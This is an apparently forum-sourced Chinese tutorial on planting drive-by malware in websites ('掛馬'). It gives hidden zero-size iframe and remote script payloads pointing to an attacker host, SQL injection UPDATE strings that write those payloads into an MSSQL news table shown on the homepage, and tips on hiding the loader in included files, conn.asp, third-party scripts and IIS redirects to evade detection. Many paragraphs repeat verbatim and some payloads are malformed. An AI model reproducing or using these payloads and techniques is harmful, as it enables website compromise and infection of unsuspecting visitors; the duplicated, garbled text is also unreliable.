這裏我拿掛首頁index.asp來舉例子。
先說一說,得到webshell的掛馬方法
一般的掛馬的都是用框架,這是最基本的掛馬方式,只要不破壞原有的語言邏輯,那就想插入哪裏就寫哪裏了,最基本的語句當然是<iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>,其中[url]http://www.fucksb.net/mm.htm[/url]是我們的***,下面就不一個一個提示了。
先說一說,得到webshell的掛馬方法
一般的掛馬的都是用框架,這是最基本的掛馬方式,只要不破壞原有的語言邏輯,那就想插入哪裏就寫哪裏了,最基本的語句當然是<iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>,其中[url]http://www.fucksb.net/mm.htm[/url]是我們的***,下面就不一個一個提示了。
上面可能是一般的掛馬方式,也是初學者的玩法,好了,再說深一點點的,那就是js文件,好多網站上,你查看源代碼都會調用js文件,其中的語句爲<script language=javascript src=./ad/ad.js></script>,想到了什麼,這裏也可以掛馬,其中我們可以遠程調用自己的js,比如:<script language=javascript src=http://www.fucksb.net/mm.js></script>這個mm.js就可以寫***了,怎麼寫呢,同樣,我們還用最基本的iframe框架,不過在<script></script>之中可識別語言不是html,那怎麼辦呢,follow me,js文件可以這樣寫:document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>");,這種形勢,這時就可以執行此js中的代碼了,當然了,說白了,其實全語句就是<script language=javascript>document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>")</script>呵呵。。
聰明的你可能發現了一點,好像不止是js文件哦~,只要在<script></script>之中,無論什麼後綴的文件,只要裏面寫的語句可以被javascript識別就會執行,對的,比如<script src=http://www.fucksb.net/mm.test></script>,又如<script src=http://www.fucksb.net/mm.lala></script>管他的後綴是什麼,只要裏面寫的語句正確就會被執行了。
同樣,如果首頁調用其它網站,或者次級目錄中的htm,asp等如:<iframe src=./ad/news.htm width=300 height=200></iframe>
也可以在news.htm文件裏掛馬,可以是htm和js,隨便哪種,這是比較隱蔽的玩法,這些適用於主頁沒有寫權限的方法。
也可以在news.htm文件裏掛馬,可以是htm和js,隨便哪種,這是比較隱蔽的玩法,這些適用於主頁沒有寫權限的方法。
<script>同<iframe>2個相比較,好處是script整體掛馬的代碼長度比iframe小得多,很實用。說實用是在數據庫方面,下面介紹。
數據庫掛馬,這裏我們拿mssql數據庫爲例子。
這裏說的是首頁調用到的數據庫,比如新聞,論壇,公告,等等,一般是標題。這些需要經驗去檢測,舉個例子,比如首頁有一條新聞爲:“明日開業”,那麼鼠標點此新聞,地址欄打開的新窗口爲news.asp?id=1,這種情況,這時,就可以判斷此新聞是從數據庫中調用的了,當然了,我們不說access,只說mssql。
首頁,我們要有這個網站中的一個注入點,比如就點在vote.asp?id=123,同時,至少是Db_owner權限,這時如果要掛馬可以不用取到webshell,因爲如果我們的目的只在於掛馬的話,而且有時,還得檢測mssql數據庫和web服務器不在同一個機器上,那掛馬的方式就是更改數據庫內容,這裏我說的就是這種,如上面說的,首頁顯示的一條新聞標題爲“明日開業”,如果首頁顯示的標題是“明日開業</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>”,那這樣的話,首頁就會執行這段代碼了,像這種情況,找到了注入點,就得找表名,如此新聞的表名爲news,字段爲title,id,等等,根據猜測,id=1時,暴出的字段title的值就爲“明日開業”,那麼90%就可以猜到了,首頁調用的數據庫的字段就爲news表中的title,這時在注入點,可以大膽提交vote.asp?id=123;update news set title='明日開業</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>' where id=1;--,這樣就可以更改數據庫了,前提是最少要少db_owner權限,當然也有時由於代碼原因,也可以這樣提交:vote.asp?id=123';update news set title='明日開業</a><ifrmae src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>' where id=1 and '1'='1,也可以...
這種方法是有問題的,實戰中存在不少問題,因爲一般的情況下,標題都是通過<table>來限制寬度,也就是說如果你的標題的長度超過了指定的長度,那麼你的代碼只能寫一半,這樣就不能執行了,所以掛馬最好的方法是用<script>這種方法來掛馬了,如:
vote.asp?id=123;update news set title='明日開業</a><script src=http://www.fucksb.net/mm.js></script>' where id=1;--長度有很大的減少,很不錯。
首頁,我們要有這個網站中的一個注入點,比如就點在vote.asp?id=123,同時,至少是Db_owner權限,這時如果要掛馬可以不用取到webshell,因爲如果我們的目的只在於掛馬的話,而且有時,還得檢測mssql數據庫和web服務器不在同一個機器上,那掛馬的方式就是更改數據庫內容,這裏我說的就是這種,如上面說的,首頁顯示的一條新聞標題爲“明日開業”,如果首頁顯示的標題是“明日開業</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>”,那這樣的話,首頁就會執行這段代碼了,像這種情況,找到了注入點,就得找表名,如此新聞的表名爲news,字段爲title,id,等等,根據猜測,id=1時,暴出的字段title的值就爲“明日開業”,那麼90%就可以猜到了,首頁調用的數據庫的字段就爲news表中的title,這時在注入點,可以大膽提交vote.asp?id=123;update news set title='明日開業</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>' where id=1;--,這樣就可以更改數據庫了,前提是最少要少db_owner權限,當然也有時由於代碼原因,也可以這樣提交:vote.asp?id=123';update news set title='明日開業</a><ifrmae src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>' where id=1 and '1'='1,也可以...
這種方法是有問題的,實戰中存在不少問題,因爲一般的情況下,標題都是通過<table>來限制寬度,也就是說如果你的標題的長度超過了指定的長度,那麼你的代碼只能寫一半,這樣就不能執行了,所以掛馬最好的方法是用<script>這種方法來掛馬了,如:
vote.asp?id=123;update news set title='明日開業</a><script src=http://www.fucksb.net/mm.js></script>' where id=1;--長度有很大的減少,很不錯。
後臺掛馬
通常注入等不到webshell,就只能@@進後臺掛馬。
通常注入等不到webshell,就只能@@進後臺掛馬。
這裏說的是進入了後臺,但不能通過後臺得到webshell,這時要仔細關察後臺,像比較網站的鏈接、頂部底部的廣告、都可以直接寫入你的***代碼,等等,後臺是靈活的,具體問題具體分析。不過有一點很重要,是不要打亂前臺htm源文件裏的代碼邏輯,比如應該閉合前面的<a><img>"( 等這些符號,應該先閉合掉如</a></img>")。
其它形式
如一首頁調用了<iframe src=vote.asp?id=1&no=view width=100></iframe>此種形勢,一樣可以在vote.asp中直接寫入iframe***代碼,如果調用的是<script src=vote.asp?id=1&no=view width=100></script>在vote.asp寫代碼時,請用document.write("")這種格式寫入,當然,如果被掛文件中還有調用的文件可以繼續往深處寫,如果你夠狠的話,直接寫到數據庫配置文件中,如conn.asp,這樣好多頁面可以同時掛上你的一種***了。
當然這裏也有js文件,一樣原理。
掛一個網站的馬,不一定就得攻入他,有時沒有方法的同時,可以考慮跨站。好多站用了別的站的js文件,如:<script src=http://www.163.com/user.js>這種情勢,這時就可以考慮只拿163.com的權限就行了,只要能修改到user.js文件就可以掛到你要掛的站點了,同理,也有<iframe src=http://www.163.com/user.htm>此種情況,一樣道理,劍走偏鋒,達到目的,無論用什麼招數了。
當然這裏也有js文件,一樣原理。
掛一個網站的馬,不一定就得攻入他,有時沒有方法的同時,可以考慮跨站。好多站用了別的站的js文件,如:<script src=http://www.163.com/user.js>這種情勢,這時就可以考慮只拿163.com的權限就行了,只要能修改到user.js文件就可以掛到你要掛的站點了,同理,也有<iframe src=http://www.163.com/user.htm>此種情況,一樣道理,劍走偏鋒,達到目的,無論用什麼招數了。
服務器掛馬
這裏簡單說一個比較狠的吧.
重定向任何調用的htm,js,等文件,只要是執行的如圖
這裏簡單說一個比較狠的吧.
重定向任何調用的htm,js,等文件,只要是執行的如圖
這種方法在計算中用搜索關鍵詞是搜索不到的,反正本地怎麼找也找不到。。誰能想到是在iis裏設置的呢?而且調用文件那麼多,怎麼知道是重定向的那個文件呢?反正現在想不到有什麼好方法可以解決,如果服務器如上圖被掛馬了,偶最好的建議是重裝IIS..^_^